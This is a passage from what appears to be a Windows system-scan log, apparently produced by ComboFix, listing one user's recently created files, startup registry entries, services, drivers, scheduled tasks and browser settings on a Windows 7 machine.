2012-04-14 15:00 . 2012-04-14 15:00 -------- d-----w- c:\program files\Sandboxie
2012-04-14 13:56 . 2012-04-14 13:56 -------- d--h--w- c:\users\Vincent\SoftRecovery
2012-04-14 13:56 . 2012-04-14 13:56 -------- d--h--w- c:\users\Vincent\UserProfile
2012-04-14 11:39 . 2012-04-17 23:54 -------- d-----w- c:\users\Vincent\.gstreamer-0.10
2012-04-14 11:18 . 2012-04-14 11:47 -------- d-----w- c:\program files (x86)\Spybot - Search & Destroy
2012-04-14 11:18 . 2012-04-14 11:44 -------- d-----w- c:\programdata\Spybot - Search & Destroy
2012-04-14 02:57 . 2012-04-14 02:57 -------- d-----w- c:\users\Vincent\AppData\Roaming\RightsNetwork
2012-04-14 02:56 . 2012-04-14 02:58 -------- d-----w- c:\program files (x86)\RightsNetwork
2012-04-13 16:28 . 2012-04-13 16:28 -------- d--h--w- c:\programdata\Common Files
2012-04-13 13:53 . 2012-04-13 13:53 -------- d-----w- c:\program files\Windows Live
2012-04-13 00:04 . 2012-04-05 11:08 25920 ----a-w- c:\windows\system32\authuitu.dll
2012-04-13 00:04 . 2012-04-05 11:08 21312 ----a-w- c:\windows\SysWow64\authuitu.dll
2012-04-12 04:17 . 2012-03-01 06:46 23408 ----a-w- c:\windows\system32\drivers\fs_rec.sys
2012-04-12 04:17 . 2012-03-01 06:33 81408 ----a-w- c:\windows\system32\imagehlp.dll
2012-04-12 04:17 . 2012-03-01 05:33 159232 ----a-w- c:\windows\SysWow64\imagehlp.dll
2012-04-12 04:17 . 2012-03-01 06:38 220672 ----a-w- c:\windows\system32\wintrust.dll
2012-04-12 04:17 . 2012-03-01 06:28 5120 ----a-w- c:\windows\system32\wmi.dll
2012-04-12 04:17 . 2012-03-01 05:37 172544 ----a-w- c:\windows\SysWow64\wintrust.dll
2012-04-12 04:17 . 2012-03-01 05:29 5120 ----a-w- c:\windows\SysWow64\wmi.dll
2012-04-11 22:47 . 2012-04-11 22:47 -------- d-----w- c:\program files (x86)\SystemRequirementsLab
2012-04-11 22:47 . 2012-04-11 22:47 -------- d-----w- c:\users\Vincent\AppData\Roaming\SystemRequirementsLab
2012-04-09 01:51 . 2012-04-09 02:02 298016 ----a-w- c:\windows\SysWow64\PnkBstrB.xtr
2012-04-09 01:51 . 2012-04-09 01:51 -------- d-----w- c:\users\Vincent\AppData\Local\PunkBuster
2012-04-09 01:27 . 2012-04-09 01:27 -------- d-----w- C:\Perfect World Entertainment
2012-04-09 01:26 . 2012-04-09 01:26 -------- d-----w- c:\windows\3F5C371F8EA24F259D3DD0B4526E3AEA.TMP
2012-04-09 01:25 . 2012-04-09 01:25 -------- d-----w- c:\program files (x86)\Common Files\Wise Installation Wizard
2012-04-09 01:25 . 2012-04-09 02:02 298016 ----a-w- c:\windows\SysWow64\PnkBstrB.exe
2012-04-09 01:25 . 2012-04-09 01:51 298016 ----a-w- c:\windows\SysWow64\PnkBstrB.ex0
2012-04-09 01:25 . 2012-04-09 01:52 76888 ----a-w- c:\windows\SysWow64\PnkBstrA.exe
2012-04-09 01:25 . 2011-12-19 14:16 3130440 ----a-w- c:\windows\SysWow64\pbsvc_blr.exe
2012-04-08 17:10 . 2012-04-08 17:10 -------- d-----w- c:\users\Vincent\AppData\Local\Skyrim
2012-04-08 16:59 . 2012-04-08 17:09 -------- d-----w- c:\program files (x86)\The Elder Scrolls V Skyrim
2012-04-08 15:44 . 2012-04-13 23:44 8741536 ----a-w- c:\windows\SysWow64\FlashPlayerInstaller.exe
2012-04-08 15:03 . 2012-04-13 23:44 418464 ----a-w- c:\windows\SysWow64\FlashPlayerApp.exe
2012-04-08 01:26 . 2012-04-08 01:26 -------- d-----w- c:\program files\Bonjour
2012-04-08 01:26 . 2012-04-08 01:26 -------- d-----w- c:\program files (x86)\Bonjour
2012-04-08 01:26 . 2012-04-08 01:26 -------- d-----w- c:\programdata\Apple
2012-04-08 01:09 . 2012-04-08 01:16 -------- d-----w- c:\programdata\webcamXP 5
2012-04-08 00:55 . 2012-04-08 15:01 -------- d-----w- c:\program files (x86)\ManyCam
2012-04-08 00:54 . 2012-04-08 00:54 -------- d-----w- c:\programdata\Ask
2012-04-07 23:03 . 2012-04-07 23:03 -------- d-----w- c:\users\Vincent\AppData\Roaming\Malwarebytes
2012-04-07 23:03 . 2012-04-07 23:03 -------- d-----w- c:\programdata\Malwarebytes
2012-04-07 23:03 . 2012-04-11 11:04 -------- d-----w- c:\program files (x86)\Malwarebytes' Anti-Malware
2012-04-07 23:03 . 2012-04-04 14:56 24904 ----a-w- c:\windows\system32\drivers\mbam.sys
2012-04-07 22:50 . 2012-04-07 22:50 -------- d-----w- c:\users\UpdatusUser
2012-04-06 22:25 . 2012-04-06 22:25 -------- d-----w- c:\users\Vincent\AppData\Roaming\StreamTorrent
2012-04-06 22:05 . 2012-04-06 22:05 -------- d-----w- c:\users\Vincent\AppData\Local\Facebook
2012-04-05 21:46 . 2012-04-05 21:46 -------- d-----w- c:\users\Vincent\AppData\Local\Motorola
2012-04-05 21:46 . 2012-04-05 21:46 -------- d-----w- c:\program files (x86)\Common Files\Nero
2012-04-05 21:46 . 2012-04-05 21:46 -------- d-----w- C:\Binaries
2012-04-05 21:46 . 2012-04-05 21:46 -------- d-----w- c:\programdata\Nero
2012-04-05 21:46 . 2012-04-05 21:46 -------- d-----w- c:\program files (x86)\Motorola Media Link
2012-04-05 21:46 . 2012-04-05 21:46 -------- d-----w- c:\programdata\Motorola
2012-04-05 21:46 . 2012-04-05 21:46 -------- d-----w- c:\program files (x86)\Motorola Mobility
2012-04-05 21:46 . 2012-04-05 21:46 -------- d-----w- c:\program files\Motorola Inc
2012-04-05 21:44 . 2012-04-17 23:59 -------- d-----w- c:\users\Vincent\AppData\Roaming\MotoCast
2012-04-05 16:21 . 2012-04-17 23:00 -------- d-----w- c:\users\Vincent\AppData\Local\Pokki
2012-04-04 12:20 . 2012-04-04 12:20 -------- d-----w- c:\users\Vincent\AppData\Roaming\AVS4YOU
2012-04-04 02:16 . 2012-04-04 02:44 -------- d-----w- C:\Fraps
2012-03-31 14:30 . 2012-03-31 14:36 -------- d-----w- c:\program files (x86)\Amnesia - The Dark Descent
2012-03-30 21:08 . 2012-03-30 21:08 -------- d-----w- C:\NEXON
.
.
.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2012-04-13 23:44 . 2011-12-30 22:06 70304 ----a-w- c:\windows\SysWow64\FlashPlayerCPLApp.cpl
2012-04-05 11:08 . 2012-03-06 21:22 34624 ----a-w- c:\windows\system32\TURegOpt.exe
2012-04-05 11:08 . 2012-03-06 21:25 35648 ----a-w- c:\windows\system32\uxtuneup.dll
2012-04-05 11:08 . 2012-03-06 21:25 28992 ----a-w- c:\windows\SysWow64\uxtuneup.dll
2012-03-08 17:50 . 2012-03-08 17:50 49016 ----a-w- c:\windows\SysWow64\sirenacm.dll
2012-03-06 12:01 . 2012-03-06 12:01 2366920 ----a-w- c:\windows\SysWow64\ijl20.dll
2012-03-01 00:02 . 2011-12-30 21:54 9717568 ----a-w- c:\windows\system32\nvwgf2umx.dll
2012-03-01 00:02 . 2011-12-30 21:54 7713088 ----a-w- c:\windows\SysWow64\nvwgf2um.dll
2012-03-01 00:02 . 2011-12-30 21:54 2660160 ----a-w- c:\windows\system32\nvapi64.dll
2012-03-01 00:02 . 2011-12-30 21:54 2301248 ----a-w- c:\windows\SysWow64\nvapi.dll
2012-03-01 00:02 . 2011-12-30 21:54 1737536 ----a-w- c:\windows\system32\nvdispco64.dll
2012-03-01 00:02 . 2011-12-30 21:54 15009600 ----a-w- c:\windows\SysWow64\nvd3dum.dll
2012-03-01 00:02 . 2011-12-30 21:54 1466176 ----a-w- c:\windows\system32\nvgenco64.dll
2012-02-29 21:00 . 2011-12-30 21:54 3089728 ----a-w- c:\windows\system32\nvsvc64.dll
2012-02-29 21:00 . 2011-12-30 21:54 6074176 ----a-w- c:\windows\system32\nvcpl.dll
2012-02-29 20:59 . 2011-12-30 21:54 889664 ----a-w- c:\windows\system32\nvvsvc.exe
2012-02-29 20:59 . 2011-12-30 21:54 63296 ----a-w- c:\windows\system32\nvshext.dll
2012-02-29 20:59 . 2011-12-30 21:54 2561856 ----a-w- c:\windows\system32\nvsvcr.dll
2012-02-29 20:59 . 2011-12-30 21:54 118080 ----a-w- c:\windows\system32\nvmctray.dll
2012-02-28 21:54 . 2012-01-07 15:17 472808 ----a-w- c:\windows\SysWow64\deployJava1.dll
2012-02-27 12:38 . 2012-02-27 12:38 2782848 ----a-w- c:\windows\system32\drivers\kinonivd.sys
2012-02-27 12:38 . 2012-02-27 12:38 23040 ----a-w- c:\windows\system32\drivers\kinonivad.sys
2012-02-23 09:18 . 2011-12-30 21:45 279656 ------w- c:\windows\system32\MpSigStub.exe
2012-02-22 10:34 . 2012-02-22 10:34 28160 ----a-w- c:\windows\system32\drivers\mcaudrv_x64.sys
2012-02-17 06:38 . 2012-03-14 14:05 1112064 ----a-w- c:\windows\system32\rdpcorets.dll
2012-02-17 06:38 . 2012-03-14 14:05 1031680 ----a-w- c:\windows\system32\rdpcore.dll
2012-02-17 05:34 . 2012-03-14 14:05 826880 ----a-w- c:\windows\SysWow64\rdpcore.dll
2012-02-17 04:58 . 2012-03-14 14:05 210944 ----a-w- c:\windows\system32\drivers\rdpwd.sys
2012-02-17 04:57 . 2012-03-14 14:05 23552 ----a-w- c:\windows\system32\drivers\tdtcp.sys
2012-02-10 06:36 . 2012-03-14 14:06 1544192 ----a-w- c:\windows\system32\DWrite.dll
2012-02-10 05:38 . 2012-03-14 14:06 1077248 ----a-w- c:\windows\SysWow64\DWrite.dll
2012-02-03 04:34 . 2012-03-14 14:06 3145728 ----a-w- c:\windows\system32\win32k.sys
2012-01-25 12:58 . 2012-01-25 12:58 27136 ----a-w- c:\windows\system32\drivers\Motousbnet.sys
2012-01-25 12:57 . 2012-01-25 12:57 30720 ----a-w- c:\windows\system32\drivers\motmodem.sys
2012-01-25 12:57 . 2012-01-25 12:57 9728 ----a-w- c:\windows\system32\drivers\motccgpfl.sys
2012-01-25 12:57 . 2012-01-25 12:57 22016 ----a-w- c:\windows\system32\drivers\motccgp.sys
2012-01-25 06:38 . 2012-03-14 14:05 77312 ----a-w- c:\windows\system32\rdpwsx.dll
2012-01-25 06:38 . 2012-03-14 14:05 149504 ----a-w- c:\windows\system32\rdpcorekmts.dll
2012-01-25 06:33 . 2012-03-14 14:05 9216 ----a-w- c:\windows\system32\rdrmemptylst.exe
.
.
((((((((((((((((((((((((((((( SnapShot@2012-04-16_20.09.14 )))))))))))))))))))))))))))))))))))))))))
.
- 2009-07-14 04:54 . 2012-04-16 20:01 16384 c:\windows\SysWOW64\config\systemprofile\AppData\Roaming\Microsoft\Windows\Cookies\index.dat
+ 2009-07-14 04:54 . 2012-04-17 20:25 16384 c:\windows\SysWOW64\config\systemprofile\AppData\Roaming\Microsoft\Windows\Cookies\index.dat
- 2009-07-14 04:54 . 2012-04-16 20:01 32768 c:\windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat
+ 2009-07-14 04:54 . 2012-04-17 20:25 32768 c:\windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat
- 2009-07-14 04:54 . 2012-04-16 20:01 16384 c:\windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat
+ 2009-07-14 04:54 . 2012-04-17 20:25 16384 c:\windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat
+ 2011-12-30 21:59 . 2012-04-17 23:54 34408 c:\windows\system32\wdi\ShutdownPerformanceDiagnostics_SystemData.bin
+ 2009-07-14 05:10 . 2012-04-17 23:54 40680 c:\windows\system32\wdi\BootPerformanceDiagnostics_SystemData.bin
+ 2011-12-30 21:29 . 2012-04-17 23:54 11416 c:\windows\system32\wdi\{86432a0b-3c7d-4ddf-a89c-172faa90485d}\S-1-5-21-450020240-1868592112-3265372428-1000_UserData.bin
+ 2011-12-30 21:05 . 2012-04-17 23:57 16384 c:\windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Cookies\index.dat
- 2011-12-30 21:05 . 2012-04-14 12:26 16384 c:\windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Cookies\index.dat
- 2011-12-30 21:05 . 2012-04-14 12:26 32768 c:\windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat
+ 2011-12-30 21:05 . 2012-04-17 23:57 32768 c:\windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat
+ 2009-07-14 04:54 . 2012-04-17 23:57 16384 c:\windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat
- 2009-07-14 04:54 . 2012-04-14 12:26 16384 c:\windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat
+ 2012-04-18 00:11 . 2012-04-18 00:11 2048 c:\windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.dat
- 2012-04-16 20:08 . 2012-04-16 20:08 2048 c:\windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.dat
+ 2012-04-18 00:11 . 2012-04-18 00:11 2048 c:\windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.dat
- 2012-04-16 20:08 . 2012-04-16 20:08 2048 c:\windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.dat
+ 2012-04-17 20:25 . 2012-04-17 20:25 262144 c:\windows\SysWOW64\config\systemprofile\AppData\Roaming\Microsoft\Windows\IETldCache\index.dat
+ 2011-12-31 13:36 . 2012-04-17 19:14 271114 c:\windows\system32\wdi\SuspendPerformanceDiagnostics_SystemData_S3.bin
- 2011-12-31 21:26 . 2012-04-16 19:49 374220 c:\windows\system32\prfh0804.dat
+ 2011-12-31 21:26 . 2012-04-17 21:04 374220 c:\windows\system32\prfh0804.dat
- 2011-12-31 21:59 . 2012-04-16 19:49 390322 c:\windows\system32\prfh0404.dat
+ 2011-12-31 21:59 . 2012-04-17 21:04 390322 c:\windows\system32\prfh0404.dat
- 2011-12-31 21:26 . 2012-04-16 19:49 108472 c:\windows\system32\prfc0804.dat
+ 2011-12-31 21:26 . 2012-04-17 21:04 108472 c:\windows\system32\prfc0804.dat
+ 2011-12-31 21:59 . 2012-04-17 21:04 103558 c:\windows\system32\prfc0404.dat
- 2011-12-31 21:59 . 2012-04-16 19:49 103558 c:\windows\system32\prfc0404.dat
+ 2011-12-31 22:16 . 2012-04-17 21:04 400970 c:\windows\system32\perfh011.dat
- 2011-12-31 22:16 . 2012-04-16 19:49 400970 c:\windows\system32\perfh011.dat
+ 2009-07-14 02:36 . 2012-04-17 21:04 628460 c:\windows\system32\perfh009.dat
- 2009-07-14 02:36 . 2012-04-16 19:49 628460 c:\windows\system32\perfh009.dat
- 2011-12-31 22:16 . 2012-04-16 19:49 110612 c:\windows\system32\perfc011.dat
+ 2011-12-31 22:16 . 2012-04-17 21:04 110612 c:\windows\system32\perfc011.dat
+ 2009-07-14 02:36 . 2012-04-17 21:04 110612 c:\windows\system32\perfc009.dat
- 2009-07-14 02:36 . 2012-04-16 19:49 110612 c:\windows\system32\perfc009.dat
- 2009-07-14 05:01 . 2012-04-16 20:07 515436 c:\windows\ServiceProfiles\LocalService\AppData\Local\FontCache-System.dat
+ 2009-07-14 05:01 . 2012-04-18 00:11 515436 c:\windows\ServiceProfiles\LocalService\AppData\Local\FontCache-System.dat
- 2011-12-31 01:48 . 2012-04-13 19:58 2104020 c:\windows\ServiceProfiles\LocalService\AppData\Local\FontCache-S-1-5-21-450020240-1868592112-3265372428-1000-12288.dat
+ 2011-12-31 01:48 . 2012-04-17 23:44 2104020 c:\windows\ServiceProfiles\LocalService\AppData\Local\FontCache-S-1-5-21-450020240-1868592112-3265372428-1000-12288.dat
+ 2011-12-30 21:56 . 2012-04-18 00:11 60853980 c:\windows\ServiceProfiles\LocalService\AppData\Local\FontCache-S-1-5-21-450020240-1868592112-3265372428-1000-8192.dat
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Pokki"="c:\users\Vincent\AppData\Local\Pokki\v0.252\pokki.exe" [2012-04-13 2540856]
"MotoCast"="c:\program files (x86)\Motorola Mobility\MotoCast\MotoLauncher.lnk" [2012-04-05 2051]
"Facebook Update"="c:\users\Vincent\AppData\Local\Facebook\Update\FacebookUpdate.exe" [2012-04-06 137536]
"SpybotSD TeaTimer"="c:\program files (x86)\Spybot - Search & Destroy\TeaTimer.exe" [2009-03-05 2260480]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run]
"Malwarebytes' Anti-Malware"="c:\program files (x86)\Malwarebytes' Anti-Malware\mbamgui.exe" [2012-04-04 462408]
.
c:\users\Vincent\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Facebook Messenger.lnk - c:\users\Vincent\AppData\Local\Facebook\Messenger\2.0.4478.0\FacebookMessenger.exe [2012-4-5 204288]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 5 (0x5)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableUIADesktopToggle"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa]
Security Packages REG_MULTI_SZ kerberos msv1_0 schannel wdigest tspkg pku2u livessp
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys]
@="Driver"
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\run-]
"Adobe ARM"="c:\program files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
"SunJavaUpdateSched"="c:\program files (x86)\Common Files\Java\Java Update\jusched.exe"
"AdobeCS5ServiceManager"="c:\program files (x86)\Common Files\Adobe\CS5ServiceManager\CS5ServiceManager.exe" -launchedbylogin
"YouCam Service"="c:\program files (x86)\CyberLink\YouCam\YouCamService.exe" /s
"BCSSync"="c:\program files (x86)\Microsoft Office\Office14\BCSSync.exe" /DelayServices
"SwitchBoard"=c:\program files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe
.
R2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;c:\windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2010-03-18 130384]
R2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2010-03-18 138576]
R3 AdobeFlashPlayerUpdateSvc;Adobe Flash Player Update Service;c:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2012-04-13 253088]
R3 BTCFilterService;USB Networking Driver Filter Service;c:\windows\system32\DRIVERS\motfilt.sys [x]
R3 EagleX64;EagleX64;c:\windows\system32\drivers\EagleX64.sys [x]
R3 KINONI_Wave;Kinoni Audio Source;c:\windows\system32\drivers\kinonivad.sys [x]
R3 kinonivd;Kinoni Video Source;c:\windows\system32\DRIVERS\kinonivd.sys [x]
R3 ManyCam;ManyCam Virtual Webcam;c:\windows\system32\DRIVERS\mcvidrv_x64.sys [x]
R3 mcaudrv_simple;ManyCam Virtual Microphone;c:\windows\system32\drivers\mcaudrv_x64.sys [x]
R3 motandroidusb;Mot ADB Interface Driver;c:\windows\system32\Drivers\motoandroid.sys [x]
R3 motccgp;Motorola USB Composite Device Driver;c:\windows\system32\DRIVERS\motccgp.sys [x]
R3 motccgpfl;MotCcgpFlService;c:\windows\system32\DRIVERS\motccgpfl.sys [x]
R3 Motousbnet;Motorola USB Networking Driver Service;c:\windows\system32\DRIVERS\Motousbnet.sys [x]
R3 NMgamingmsFltr;USB Optical Mouse;c:\windows\system32\drivers\NMgamingms.sys [x]
R3 osppsvc;Office Software Protection Platform;c:\program files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE [2010-01-09 4925184]
R3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;c:\windows\system32\drivers\rdpvideominiport.sys [x]
R3 SwitchBoard;SwitchBoard;c:\program files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [2010-02-19 517096]
R3 Synth3dVsc;Synth3dVsc;c:\windows\system32\drivers\synth3dvsc.sys [x]
R3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\tsusbflt.sys [x]
R3 tsusbhub;tsusbhub;c:\windows\system32\drivers\tsusbhub.sys [x]
R3 VGPU;VGPU;c:\windows\system32\drivers\rdvgkmd.sys [x]
R3 WatAdminSvc;Windows Activation Technologies Service;c:\windows\system32\Wat\WatAdminSvc.exe [x]
R3 WDC_SAM;WD SCSI Pass Thru driver;c:\windows\system32\DRIVERS\wdcsam64.sys [x]
S0 epfwwfp;epfwwfp;c:\windows\system32\DRIVERS\epfwwfp.sys [x]
S1 ehdrv;ehdrv;c:\windows\system32\DRIVERS\ehdrv.sys [x]
S1 EpfwLWF;Epfw NDIS LightWeight Filter;c:\windows\system32\DRIVERS\EpfwLWF.sys [x]
S1 vwififlt;Virtual WiFi Filter Driver;c:\windows\system32\DRIVERS\vwififlt.sys [x]
S2 AdobeARMservice;Adobe Acrobat Update Service;c:\program files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [2012-01-03 63928]
S2 AESTFilters;Andrea ST Filters Service;c:\windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_960c1f056a541068\AESTSr64.exe [2009-03-02 89600]
S2 DeviceMonitorService;DeviceMonitorService;c:\program files (x86)\Motorola Media Link\Lite\NServiceEntry.exe [2012-02-16 87368]
S2 eamonm;eamonm;c:\windows\system32\DRIVERS\eamonm.sys [x]
S2 ekrn;ESET Service;c:\program files\ESET\ESET Smart Security\x86\ekrn.exe [2011-09-22 974944]
S2 MBAMService;MBAMService;c:\program files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe [2012-04-04 654408]
S2 MotoHelper;MotoHelper Service;c:\program files (x86)\Motorola\MotoHelper\MotoHelperService.exe [2012-02-01 214896]
S2 nvUpdatusService;NVIDIA Update Service Daemon;c:\program files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe [2012-03-01 2348352]
S2 SBSDWSCService;SBSD Security Center Service;c:\program files (x86)\Spybot - Search & Destroy\SDWinSec.exe [2009-01-26 1153368]
S2 TuneUp.UtilitiesSvc;TuneUp Utilities Service;c:\program files (x86)\TuneUp Utilities 2012\TuneUpUtilitiesService64.exe [2012-04-05 2143552]
S3 clwvd;CyberLink WebCam Virtual Driver;c:\windows\system32\DRIVERS\clwvd.sys [x]
S3 MBAMProtector;MBAMProtector;c:\windows\system32\drivers\mbam.sys [x]
S3 NETw5s64;Intel® Wireless WiFi Link 5000 Series Adapter Driver for Windows 7 - 64 Bit;c:\windows\system32\DRIVERS\NETw5s64.sys [x]
S3 NVHDA;Service for NVIDIA High Definition Audio Driver;c:\windows\system32\drivers\nvhda64v.sys [x]
S3 RTL8167;Realtek 8167 NT Driver;c:\windows\system32\DRIVERS\Rt64win7.sys [x]
S3 TuneUpUtilitiesDrv;TuneUpUtilitiesDrv;c:\program files (x86)\TuneUp Utilities 2012\TuneUpUtilitiesDriver64.sys [2011-12-12 11856]
.
.
Contents of the 'Scheduled Tasks' folder
.
2012-04-17 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2012-04-08 23:44]
.
2012-04-17 c:\windows\Tasks\FacebookUpdateTaskUserS-1-5-21-450020240-1868592112-3265372428-1000Core.job
- c:\users\Vincent\AppData\Local\Facebook\Update\FacebookUpdate.exe [2012-04-06 22:05]
.
2012-04-17 c:\windows\Tasks\FacebookUpdateTaskUserS-1-5-21-450020240-1868592112-3265372428-1000UA.job
- c:\users\Vincent\AppData\Local\Facebook\Update\FacebookUpdate.exe [2012-04-06 22:05]
.
.
--------- x86-64 -----------
.
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Apoint"="c:\program files\Apoint2K\Apoint.exe" [2009-05-14 318464]
"SysTrayApp"="c:\program files\IDT\WDM\sttray64.exe" [2010-03-23 487424]
"egui"="c:\program files\ESET\ESET Smart Security\egui.exe" [2011-09-22 4035152]
"TNod UP"="c:\users\Vincent\Downloads\TNOD Update\TNod-1.4.1-Final-Portable\TNODUP.exe" [2011-09-18 1892352]
.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost - NetSvcs
UxTuneUp
.
------- Supplementary Scan -------
.
uLocal Page = c:\windows\system32\blank.htm
mLocal Page = c:\windows\SysWOW64\blank.htm
uInternet Settings,ProxyOverride = *.local;192.168.*.*
IE: E&xport to Microsoft Excel - c:\progra~2\MICROS~3\Office14\EXCEL.EXE/3000
TCP: DhcpNameServer = 194.168.4.100 194.168.8.100
FF - ProfilePath - c:\users\Vincent\AppData\Roaming\Mozilla\Firefox\Profiles\febeprof.test\
FF - prefs.js: browser.startup.homepage - hxxps://www.facebook.com/|http://www.thepiratebay.org
FF - user.js: network.http.max-persistent-connections-per-server - 4
FF - user.js: nglayout.initialpaint.delay - 600
FF - user.js: content.notify.interval - 600000
FF - user.js: content.max.tokenizing.time - 1800000
FF - user.js: content.switch.threshold - 600000
.
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\S-1-5-21-450020240-1868592112-3265372428-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.eml\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="WindowsLiveMail.Email.1"
.
[HKEY_USERS\S-1-5-21-450020240-1868592112-3265372428-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vcf\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="WindowsLiveMail.VCard.1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A483C63A-CDBC-426E-BF93-872502E8144E}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_11_2_202_233_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A483C63A-CDBC-426E-BF93-872502E8144E}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A483C63A-CDBC-426E-BF93-872502E8144E}\LocalServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_11_2_202_233_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A483C63A-CDBC-426E-BF93-872502E8144E}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Shockwave Flash Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_11_2_202_233.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\MiscStatus]
@="0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ProgID]
@="ShockwaveFlash.ShockwaveFlash.11"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_11_2_202_233.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="ShockwaveFlash.ShockwaveFlash"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Macromedia Flash Factory Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_11_2_202_233.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ProgID]
